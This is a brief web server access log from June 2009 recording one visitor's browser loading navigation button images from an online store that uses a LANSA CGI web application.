201.127.210.91 - - [16/Jun/2009:00:09:56 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
201.127.210.91 - - [16/Jun/2009:00:09:57 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
201.127.210.91 - - [16/Jun/2009:00:09:57 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
201.127.210.91 - - [16/Jun/2009:00:09:58 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
201.127.210.91 - - [16/Jun/2009:00:09:59 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
